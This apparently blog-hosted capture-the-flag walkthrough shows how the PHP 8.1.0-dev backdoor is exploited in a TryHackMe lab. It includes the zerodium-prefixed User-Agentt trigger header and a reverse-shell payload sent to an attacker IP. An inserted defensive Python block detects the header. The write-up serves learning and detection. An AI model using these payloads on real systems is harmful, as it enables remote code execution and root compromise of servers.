TryHackMe | Agent T Walkthrough

Jon Headley
4 min read · Aug 9, 2022

Exploiting PHP 8.1.0-dev backdoor

Summary

This room was created by John Hammond and is an example of what happens when you use outdated, or perhaps even compromised, software. The room highlights PHP version 8.1.0-dev, which fell victim to malicious commits on the PHP GitHub repository that create a backdoor on any web server running this compromised version. If you’d like more information on the story behind this malicious attack, check out this blog here. Let’s take a look at the room!

Enumeration

Looking at the hint provided by the task, we can focus our efforts on the HTTP responses returned by the web server. First, let’s run our standard nmap scan (service/version detection plus default scripts, port 80 only):

nmap -iL hosts -sVC -p80 -oN nmapinit

The service version scan identifies that this web server is running PHP 8.1.0-dev. Now let’s look at the HTTP response when we visit the site. For this I’ll use Burp Suite. Navigate to the website using the IP address provided after starting the machine and capture the HTTP traffic. The rendered page looks like an Admin Dashboard of some kind; clicking through, the buttons either did nothing or returned a 404. Locate the first GET request to the website and confirm that the server is running PHP 8.1.0-dev by looking at the response headers, specifically the “X-Powered-By” header:

X-Powered-By: PHP/8.1.0-dev

Research

Let’s search for this PHP version using searchsploit, the Exploit-DB command-line search tool. The search yields a result for 8.1.0-dev and also provides a Python script that exploits the vulnerability.

searchsploit 8.1.0-dev

We aren’t skids around here, so instead of just running the script, let’s learn how it works by reading the code. The script’s authors provided helpful links, including a blog post that explains the backstory of the exploit; take a look.

Reading the Python script, both the script and the exploit are rather simple. The script interacts with the website using the Python requests module, adds a special request header that triggers remote code execution, and prints the server’s response. That header is User-Agentt (note the extra “t”), and its value is whatever PHP code we want the remote server to run. For this exploit let’s use PHP’s system function. The backdoor only fires when the value is prefixed with zerodium, so that string must be prepended to the command we wish to run. Sending this in Burp Repeater looks like this:

User-Agentt: zerodiumsystem('ls -al');
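From the defender’s side, the two indicators this section describes are easy to check for: a response advertising PHP/8.1.0-dev in X-Powered-By, and a request carrying the misspelled User-Agentt header with the zerodium prefix. The following Python is an added example, not code from the walkthrough or from the Exploit-DB script; it parses constructed raw HTTP messages (sample data, not captured from the room) and classifies them.

```python
# Constructed sample HTTP messages for the demo (not captured from the room).
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: target\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET /admin HTTP/1.1\r\nHost: target\r\n"
    "User-Agentt: zerodiumsystem('ls -al');\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: target\r\nuser-agentt: ZERODIUMecho 1;\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: target\r\nUser-Agentt: curl/7.0\r\n\r\n",
]
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nX-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-Type: text/html\r\n\r\n<html></html>"
)


def parse_headers(raw):
    """Map lowercase header name -> value from a raw HTTP request or response."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request/status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def classify_request(raw):
    """'trigger'    -> User-Agentt present and value starts with zerodium
       'suspicious' -> the misspelled header is present at all
       'clean'      -> header absent
    Header names and the prefix are compared case-insensitively so a log
    search does not miss trivially recased variants."""
    headers = parse_headers(raw)
    if "user-agentt" not in headers:
        return "clean"
    if headers["user-agentt"].lower().startswith("zerodium"):
        return "trigger"
    return "suspicious"


def server_reports_backdoored_php(raw_response):
    """True when the response advertises the compromised dev build."""
    return parse_headers(raw_response).get("x-powered-by", "") == "PHP/8.1.0-dev"


def scan_requests(requests):
    """Return (index, verdict) for every request that is not clean."""
    results = []
    for i, raw in enumerate(requests):
        verdict = classify_request(raw)
        if verdict != "clean":
            results.append((i, verdict))
    return results
```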

Now that we have a proof of concept, let’s exploit this vulnerability to compromise the server.

Exploit

In this example I decided to spawn a reverse shell using the User-Agentt method above. There are many ways to spawn reverse shells; in this instance I used the shell command suggested in the blog: 'bash -c "bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"'. I started a netcat listener with nc -lvnp 443 and used Burp Repeater to deliver the exploit:

User-Agentt: zerodiumsystem('bash -c "bash -i >& /dev/tcp/10.6.31.202/443 0>&1"');

SUCCESS!

nc -lvnp 443

Post Exploitation and Data Exfiltration

Now that we have a shell as root, the last step is to find the flag. Since this is a TryHackMe room, flags are commonly saved in files such as “flag.txt”. I used find to search for it, quoting the pattern so the shell does not expand the glob before find sees it: find / -name '*flag*' 2>/dev/null

Bing Pot! Our flag is located at /flag.txt which we can easily read since we are root.

Conclusion

PHP 8.1.0-dev is a dangerous version of PHP that creates a backdoor into any web server running it. Attackers can exploit this backdoor to achieve remote code execution as the web server’s user (root, in this room). Keep an eye out for servers advertising this particular version, since compromising them is trivial.

I hope you enjoyed this walkthrough! Please contact me with any questions.


Jon Headley

From Electrical Engineering to officer in the Air Force to copier salesman to network engineer to python developer to cybersecurity…where will I go next?